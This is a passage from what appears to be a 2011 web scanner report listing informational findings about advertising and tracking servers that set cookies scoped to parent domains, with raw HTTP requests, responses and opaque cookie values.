Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C0%2C2%2C%2C; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=E3F32BD05A8DDF4D5646D79640088B; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
12.37. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=2be5fb6c-c0d8-147f-d80c-480b0a7b0393&rtb=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1308190406; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:27 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 23-Jun-2013 17:04:27 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
12.38. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=D_F1HyIlEt90XWOwBLOFNrAiPk8Ac4qydps8iNraMEKDvodA_sbW8c2JnlV_mybf1n-tmlhhoYFMuRzx0bELYA&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUUIXmPY-LZhNX08PCC1AA7AyxwLL3zQuBx6dhirOES5Nb1eoO8ppIMYGmHJG75FIrenYIGOYR5vPsApCsV7LwfVDjW_3mDwgxgaYckbvkUit6dggY5hHmRvPUTVUGpkj-QsuiT06jI7d21Tw1bGbBC95icxGNgrvI8sTlfLiUVirVDHB_PLB3B7dLv8mQai9FqZxhT-hpTl-Vx6Wg5mtI-fW_MsrYoi_G937R2K7HfGbS1pD2qdcOnXltfs4lBeLOoVY-5Ey0aGA-3n6D_561g-DmvDpQzUlnrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6EREEPS8RoGZCwLoPdHLH_1_KrNYgVxbvf599PPhoGkRwfnOHjpvtkzSEl4d-wdumAAceRGHz-2NrTvKdg0ajpYMtRTvb1kIdd3t20BSfIvd2lR7INwxHtn1BHnDvA-Z2YBr8_jyLUTphI-uJbntsEgC40HfGMMs5mhycnLkZacVec5BRFaFQeeKtoiQ2ejjL3t_kvLTuGDqhWfDkMq3m37HLQ6_3tKFpdfm7OKds5BK7lHu_KQngb9uWehxOQdoyU9DVTnKf4h_4wFcB-MHxcwQ4hgLxYFNBfxtRQheY9j4tnUR_l5Brxo2KRun1gRg513r3ZIOVck9DhuO6-IqSFo3gxgaYckbvkUit6dggY5hHk7xWvxGLYUnQUrfHnC2Gqe7d21Tw1bGbBC95icxGNgrqXK0KyGesFe6hp6T2h-gtTTHNROdRJkLW60A5ndHmAPhgonwfQhEeePqfqzvmoq8_lBesygiIexbjc4i-o7dvenXltfs4lBeLOoVY-5Ey0a54agTyYUq_bAlM32IeJPP1nrCYWMZMOp1_Zkd_EZ8Vr0wbWdoCX3pOkiK5V0V6ER24q8YARiXvoueVF-B0Y7g6rNYgVxbvf599PPhoGkRwfdcxy6ywBRL0NjuPNLjyQkIkVHFILGNxnKUUZcH3JqRMh7s8KySk9WZWXmyLhGVZrs1C9m3PofcnmLKlVpgqYp9o6yvy84eluGVbohcnU12x7ZGYBjzf2udup-eHNa_Z2l9TAOlxk6MdeH2Q0QN4u8lwEjJzCAh1JYBH_NCxDWLbRgPNRTtLafwg9EA77wPIbJK2DjVNxAKeXIyhPIlCfc2QcZO8j6n47WVoKyeRrwcQGp1RlCeoRdbDS-DCdBrizXyhwoKg_Jo1APlrFxO5Qk18ocKCoPyaNQD5axcTuUJJH99Vdy7-581u2dx9OI_4HSK4Sdj5ZIO--EDaPhCReB0iuEnY-WSDvvhA2j4QkXgSVUeVLhXuLgjvBuZxgQvSw11T9tbDb-gupP-B4n2vxWNdU_bWw2_oLqT_geJ9r8VkGGD6sgfruhLxbvILRkdNlBhg-rIH67oS8W7yC0ZHTZKfRWXpUe2qeTc9JXMrn9VebJJoszGDQ3Eaexwt4cZZnUf20A3lCmjUuR-61VCX-NvU4nZmT5VF5Zn8llrbxzhrIPwEo3vkVRKHPopqx1EXu9w1q2IoQvSKH3wx5RmjqUvcNatiKEL0ih98MeUZo6lP2y8DrZPXMQA47HQ2Q16DsjEvzTmFPT5iAsrcfOLHBZIxL805hT0-YgLK3HzixwWTSa5W4FegvUpGyjvuJ6ISMoqk7YbtQbg4XBUuKMramGKKpO2G7UG4OFwVLijK2phoX8bz27oRd3gSS6KBPjreNNE1kZitqao1cu52aL_QsOTRNZGYramqNXLudmi_0LDk0TWRmK2pqjVy7nZov9Cw4rvuDFraCo_Irvttq09dSPZOg_D4rinflq6mkPppcy6WToPw-K4p35auppD6aXMulk6D8PiuKd-WrqaQ-mlzLphlGpNv9ySx5Y5purEM9X4YcjuFEJGiw-vacCiCpLSdSHI7hRCRosPr2nAogqS0nUhyO4UQkaLD69pwKIKktJ1NCbbhlIiub2GEITxbR40HbQm24ZSIrm9hhCE8W0eNB29dWr6tv75cpLr2rKDGkGO3Qb3R2V5rwcL9Xr_UowWOh0G90dlea8HC_V6_1KMFjodBvdHZXmvBwv1ev9SjBY6EMYtI4wwQkC7G7iE0RNYtRDGLSOMMEJAuxu4hNETWLUQxi0jjDBCQLsbuITRE1i1P36QK_2LIj8IKz8yMZslPduDWDlSILalHR2_729wlJWbg1g5UiC2pR0dv-9vcJSVm4NYOVIgtqUdHb_vb3CUlaget-adSpZ90cEnqTFdoWvEzGF1_8IOlgq7Oe0jPdomO2tcbi2u9EDm-HhlRVfdZU; fc=U63FSbWkuQ-6Ehv_rHNvdi3zAlciDD1979_v8BQ05hrif4ZYhbsuYcnc3E8aiw7N0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnO8MiwtslG4QC6vJ2mX9tHFSgQ0O9mROJGoCL9gdek9ttRbI5dYkL5pqtEW6ywS8ZDwwSRX2lC4Qe-JwlhlCZWTw_zLWP1yseKkJfFCIGqWZ; pf=wUs3RJjrnHBGmoPKC2w1BSzahta4gd-h8vP4oQlAWBgStJHO4dSC7tcSjJ5dCIRN8otVVKbFPjeNTxIiX5ySOUqurdpBdA7aDRpJC66X22yIHFm0S0kHxvLP_MYOfXLQq-dHAl-abYU1X5bYp5n9CSBwbmS48Uljm8MNWJG0d45yqi9mVjA02NuqavQ6eQd_y_Nxu2TdlUTz31ahRlm2jPXSJEnzjwmCJ-ww7TyzMnW_D1Ycf85DI0aXnqcS-yYhrNze5mJSmFU_16iWg6qGXaslDVv0CEp6k0oxMtW5frkHxEQfWMRgFYDLU3__ZDn7GKhK_pbP_UBUvvBV4z0YcGVGnrhJgXnNyT8YxkkLqook3V-8aWQ5ogo6xIv_g-tlU41tEj6SOLoKbZtcPAoWvIZNSZlGi5_0oLVgGgqWSLjIumXKNgQi-6kDQjunCLT7fjwUoJhpAG-BIBpu1eL5-lDKNc4L8lxhmJCi0XSQieFhFwq7SaNdz_ocTatUAU-qEFDSOVOmzcXCrTh-KvrBNQnMcpeUOVFqdnEJkJDKTqW5CyjQ9CWSKcOGeQNIGZUPNsclUfoCKs_P08jgwSgJYbcIxoWpLP8kJHirQfhJM1m92s9xXr05DIv8cqx6xYqZz2pyniL4I0AFr11avteCTHP-MKrmQGILwqOPUURxPh_OaB7pgTaF4qWQ2HhJHM7MQ1FATrIPe9fO1W-kVj41FzAInC6SN2fmozOFzLuTgF9cmu2fgg-ptDZq0nhZGPUq7ENa4utBAijkMB8acerWmKUiG3NKxRUIkdkWSlkGWLmKvSfxSVUhBehZqqkXgkvNStUBXiPiubepGWTwbovBGpJUJQLVBqLanOblkHJu9xH3GDUUM_ZOcJx6Ga7Je7zMcY_QS925sh7URWgzYJaPWjRgkXleqqVT1LQZLlwfgGNcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSHFST6QiOZR468XMdu_IjTAaJdutfTchePMF9BJE48SVs2eS74sZWCAm9rPc1kIbbk-pKbU4KtSl-ktr55_QkH3ovtrh5jGpi8fiId0xkxWG1vbbopJLM8C9at-8yKvEqAR567tiTDPDC5AioBKZ_aEJX4PLxtPJDTh6LcF4_fx6l369zx79lO56qpsZFi6-Icne4cLOSJ3coSRqSfAxlRzGjU4Tn7VESa-w2mjoF9vwj15O7a79JjYY5qVgXc2osU2kYjIqQf2_6LnQaqKT-Pb0XaBOKdel8lyMk_dn1RYgFGIEDJrpUW62qucYCD2LJczkpLARLMKPKWRScvsz04-jesN4QzQjQFlP0J6VZDJFHmaXa4eb8PMHp0xhQcCR4bqZL9BkxhlgtnxOXWCzQELeIBJUJspLAB50oC31fGkON-rRU7eE4QzN3Cj6YpqHXvt8xLb-TJA3MW3gWM8oadZrihclDcMg24IQ1mssSMoGnSi5oFPpM3C1T95FgaV2FhfNZ-wWSAoC-ekqRlbYKilgrqOhS_hzDUPsZfBJd2FhVACj21yYaTIGE8VBZkwZ0hQ6Ladu7PughH-bIm4y0Ab6nRgUKcGXElGE-_DS4Ricu2NP8QQUwEddIGGXiI0ikX8tIMOHu7ZzFVt755dCSQZs-k9i-tjPDbhaQ0YI__sTf8igRaY5cyCnjyOwVD2OS009W1ujEvgdnOfJu5crBfoqKPISxg4JMc-wfusvOiL66IfoxhRVau6TltYBb7-XChmyRJwYT3SVN8WLd39hZk8Bc5k_8SzK7X_3Bu_DkXEJ1-0bPVbCw9gJGr_B8xDvqoSRWiJ0aXKJcZ-Rm_1IemcOgPxlg_I4GVGQsts3-Widpm2owGjEbtSLL0XOjeWJwuRIJkkBAqJsNNITsh4NZ79vNPuYVunznl4Ru-AlUbhO4WJot6ZQLYMWYK-3VIhf9NOVCTi9EKN0EChMCpt8t79taa2O8z0zAFVDyg3ety8a8X24jJ6sSBHRnGvcfC46N5cRIRjWMuveNQmJnehLSzrzO4mWkXY8sRfEZSRVF-eLcIql8-Bktoud7UrXynkSAhN6akQLaY-eXSAvrbezbiKSwrMJsaQSeTsKGuCQQr2-y5a7Qi8VwRgyzaNjUJGKJsi6dxv2oUpLC8kr0lnKkHXcJR_rGcvm6DgXUkti2dAj3C6gNLghcL1ATT4dfXoT0XCq9YPC5oENmg6G4qCLpkd6bOL8K_8x_ofi-YZIXtSwkZ2h2FTEOB7VAVaX5hOrFfnL1gLyqIqik_zuH70qAJA-PBhbA79851KT4-AG0SCN_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxoPPk2bpwxxJLKaR6-s3EU26XW92a-msXAhMgRGpU1p6Juquy9ZrCLMz-gm43o_H-Bl7sbzW9GEZ0ngzf92snAnRcT637PYoh9vs8nxEshXyZrKeJEXnSgmaEwKGT0NYjHqeyWBScug8JR8Ogml2rS_8VpwQL7zeGBwWLOtt2X6e5mIpzfBfsaJojQQA8aQFUV499JD3JawQFF-O5bgAetRXnIhw7Q1GQOqAwPZYBAlsXj29aoCtsMnTKiqJ-4FPyvAt7MYGai56hsHZYw1pPFfubGkytCfTIRLVtkmYuONkgCSYgnFnvF5gKPmXiBQ9dWg5UVe5zOlev8xSqT-8JS2EDyiLHISVTcA2XV0Papii_0G4vyX4BB1uK3mZKqFwCB7V_2_YMp2tLu2luQQzSKrFobpGzDPG60qE7Z1BueqeWLTn54P86vtZCdL4Et0GphOd6rTMoWpTj1U1wX22aW3FPU1oQkWEyK98ozmItdcuoDcloFWpq5ZHCojxL_cWf4EwTRa2OYv6xN_c1_3djCz_W53uzQhFTz7d2IZbRiKFFqlaE1XAnxcOp4xiYuYfIzeYiTtzrVIHv7wUzHKILRxITElIfz1Os_Qq07M4F9O_CBoBBTZPqpiN6lRHoduZTv7rwXS_mtQPlV9OlcM3SofjeVvDb839deLUAObQ8GB-e8PtB-b2vXw1XxBOXggLkQ33Mxxv0oPw2IFtoFLcC4UWvoXMOCBLu4d31iv78LZ7orMqeG9dIdYhrW8gVTGc8vc44PtS2IyZUysSPh_4uJu; rrs=1%7C6%7C3%7C12%7C1002%7C18%7C7%7C1%7C9%7C7%7C10%7C13%7C1003%7C1006%7C2%7C12%7C1001%7C1004%7C1008; rds=15146%7C15146%7C15149%7C15146%7C15146%7C15146%7C15149%7C15146%7C15149%7C15146%7C15146%7C15146%7C15146%7C15145%7C15146%7C15149%7C15146%7C15146%7C15149; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Wed, 21-Dec-2011 13:30:17 GMT; Path=/
Set-Cookie: pf=4blGArXvJ-PddxqdRqDw-ck00Y-5dC0-iyRiWrfLpMpMt2vNseyxoxgBojoGxwQVDRpjlVghUYhhYY80pAjmdwAhauvj1Lu_lr7-HGGkwhihCMr7KpHSbd6P95bWy9TBSXZVEiWgOeyNu1wX145Ub2PtoOXdVipFu3konRUOQage29aWjdMy7xXpqeQEJwATsyBZPqWLea4FSifO2l7YD2_pmn2ief-Xc-RWBdoHTt_kYU51MhZbU0IzUXKlO5v-Q7HYNgVTqKrGTkv5pCXX7m5O8A7FIHibGj5DpgyEHdU83j686lW_-cjpN1DdudTNYPytEqkZDnNQchjDMfNHpBES0jZY1ncB2jHnT2acYsFWMZ68HKo4c6yMqaVds04NvpjcfQIWVcOJv8gtgMUPXkfA6lLq_MpEEFfoFqFypmh46XJAwA2xbokXnMqZgYz9oJ1v_xduPBT_Xi0l9WN5Jg4rLq9q5JywkdDiwtgJHN3sYD5ckkAyyydP500XnoSzcY_QS925sh7URWgzYJaPWg-XVk0omn8onW1tDUPyMmOnFJRjBcEMxdDM5u496FsXruYQ9_ZvviEZsCTu2ab_RNu_WttD4IxsG8NecGv8aJTY1L78PWFOJccLF_SVl-p7FqQnhT285qwaHzvHjlPfy5I_P3AvoMVPhtuF37hBQY9Z5NuybpTlGcHJmRklWRV_RA8MPMKSNoh6_oE1E53WJth3jioE5hIe8CK-74c3KzqcXkoT28HeuPYoeuwow28dQIx9lMwF6iB6TuIghnXGH0QyYLOAcFPLNX3yLrH6qoL52EgbwYTJxXhwRmwhEuik_sCgzFxd080EezJvIeKOWW2prAcquUwIXvaegi9WV8PiAEb7iN9OfiWBLdBajZGUGyi7s-IM7tx9zrJ_hkKK1gadqXz1AEQ9Kh52rfmyu7XhO9AyBc5HS_FKvBNrzvX1NnUpWKiWImPUDgT77rslwLSl3XBKHJ4MTpA8HPgIw8QqSx_0qNfccCQRX4aVOVnk2zHcY1otOzk0ZTEP0SAsuQdXFxI1T1zz3y2Mk7UgxZ7d1OQKF8oiGWvOBQpx_trx1Q-qnfDRHOB5Dpn3FpDZ1ATXgvFUnbGEt4rF3gGNwTus7knJ3b7qW2W47yewVm2xthRmXWvZdI5BQq_u0Mu-9lS-iEfiLjKWR2gTCNOuFmRNawvtYkPq3yNwCWFmbofohvrSPFipFWgtdp-sKG43Pxq2SCYMvAhS8VONQS_wWh3WtxqG_jGgmJOSGSmwZeD9IUpycvqjgh8vFGYR-tHS5WHiTWsjjEdZ0PsmXSGODwNFZ5Axaz5tNa2bDpmBguwtkD68TainBEuq_2B76yZq17sU1RWr6LeIDLe6XbciblblKH4BO-voR0DwnN7FUI71wIdJBdr1gcQsTxZaSSuzrWfkqSBnDlamLtugmmmWGmN9fvYxI6Kf-sBJovwlenfNE1SOOrTttuH45en0-nRGJ--sT6bWiS8gm6DpJjDuLkB3xT7gKHPDpHrzZmQjRSeJLUoq7bVfWw7887f7PSc0EXp4tqaPid7brnZ3_Qlb0x8D-qV7cmbSJUw4vl78PuwZgV5UaY1Mg4PRmqo0jXWuxuBRQuIoiJaMR7esJH3so2xTCd6DrRQyLBqi9SrJeRUm0P7mHGN4gKA5ZSY5S24OwLo5XsFh4zQON6fKaQNhIBVSL9melLCMkV1sGktFoVRpUBVvRd9sg6OGDtvjbhzToemwg7qJElmbkTUWm4W4DiBHt6HmYWtkWMqoogUlsIHhBjT9Y34uPWhGg7YZwYHhrk5GywW-w_OVn61B7hccjD9LAPfDsilRftZ4CEB2RG6kDEYxy9VS1yrAwSw4D4cCMFhnqRd0VA9EK_YxqXJ6fUYShUKOhiF4_GtUxk_zWQ83Uc9DG2hdaZ8OsvaEJikZ1qdZfuQRBbuzjV6FEl7lWSeQ_XowopSDQO-H0Vm4jqTYEuLDHRE-prgFjq804zQljfr9BPIJjZ9larmhk-uJ-CEs8HA7pYeFZxJRXPLyyRSFLqmnnGHSTEE_efH0NsFNWKoE0xfumlZP1DEKOH5QAgRMuGrwox2mlV5LY1fpJd4pNoocNDYL294DDuF0PKLSIfw8mSPsJUyvgOVRO4tRGvrCSc1K-7cIbfWYzbcrYTKelWqHdqPXBTbUIJMRAJKgWOP1eU8fs1jrt7JeZx7JBF5CI4FvsPWJ_m93kmj_0TeFS_NKAGMIzM6Tmy5vbQPkHy4IY3IOKhe4xuVgosRXGdJM3dyn5SOOSh4G1yR8rywzDN820znf6vUURKiSxwBpO0UVJcOZjloJVfqLd7WmnpMikHqAi_a6ftyrjuLbnTxQtjlH46o2_tehmyeN54wq65fV-LO3lhsx7-dzn1TVBpsT7kn20JC2lQ9z30OTI1VzqSfqtyod-5mE-mmWkpMIbtJkFiLkTXuULzcQ-zyf5MSu1BLCWokej8nUlwEEFhHehMjw1VLCHvQ5FbATIYHl0FGFmgNWrJNqNKE6uJ1HQAlri8233ZTFeyIevlP8rUg2J-k018eXPG-oSjdEUxgUBCoN_CYJ5cWvhue28Uim-YEmsZ4GM61S-uvuM9Gqeq1y27ELHmmW7ugKnZTLD4dxBSvDjgE-aJiaNemr0W3NjeZ7MObBkWFmACgRkJj5yHRq3cQpVv0Bm0Qzj9oORn-k-l8RlvGGbEzTpcvvrS4lCaFgQO2QpPVzOyrArI2RbHkmiOo_Wofu218GLAsIrWycSiaNPE_tTYxeKQJTDU4G8H-4tfqKGsAiPqXbDomRAJrzocrDr05sMo_ye6gs65dbVQwsMQ83v_73YhGzM8J4T3gAtDeJpW8hCJaDosKSPe5DFMwTy6xu1JFnhcNdqz2nsMvzRaFzoKYp1xWGKvFi4lY7gzmJvyYHoGkQ6nl9UxRQDb0jTbcyNtlpJ-Ebhp6ZOnBrsDeqj4aYnHJcpbBJXCWUMasfcXfi6mQU4pPrNeqfqTGTpTDqBiE6IppnBuUOXNrfB81XiDTIz8jOe26rOPXeY20Ikdy11L87Wc-LxuEo-KZ1KPbsIhwZtM_J36RqAtDmcgxO9XHcLGkN-20Rcup01wqoknGjE-Unqu6nceX2EKhJ1JuW4AqxoJZ5NXCPZ9RJmkqdnqryYifTeb5Q75Q; Domain=.turn.com; Expires=Wed, 21-Dec-2011 13:30:17 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1099311&t=2
Content-Length: 0
Date: Fri, 24 Jun 2011 13:30:16 GMT

12.39. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; GUID=MTMwODcwNjA4MDsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=ON0AOFJwFob0FE8sIOwJoaAptKvBC0nR1JpwGg02FatBdbdhWbwihXo1GwjmGatBA9qhWbAZhXo1GskmGatB6ijhWbAmhXo1GAY4FatBdDmhWbA/yao1GAVZGatBYimhWbA3Wao1GUY4FatBEHohWbQVrZo1GEcgGatB25lhWbglBao1G0soGatBecphWbgCaao1GUEoGatBVGohWbAvZao1RGAZmjoRw2I9IsfzFA3shdwjkaAdumPAEOphYbLuAoKuGDxsmBwokaI2zCFALRqhY/KECcHiG0pquJQalZsBk6hB1WjxGC7gGw8jGg4tSbAr8aEi0mvBz8qRJypkCgDiGKqAfarhiC; F1=B40QD4EBAAAABAAAAEAAgEA; BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Rbf0hn7jp9fCFhyHRGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGdwhGsOk0AZdUwkslKVCJkL3eHCKdue5CKYmQi/tQzZQgKe5KrRixKNB4Qxyr5mZC6aDHAlSZjdmk7zuiwXsX8/PTGAEVbwPw/pNOIDL!; ROLL=U6APDjeaptEWZ9P!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.783617.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Fri, 24 Jun 2011 13:26:46 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Fri, 24 Jun 2011 13:26:46 GMT
Connection: close
Vary: Accept-Encoding
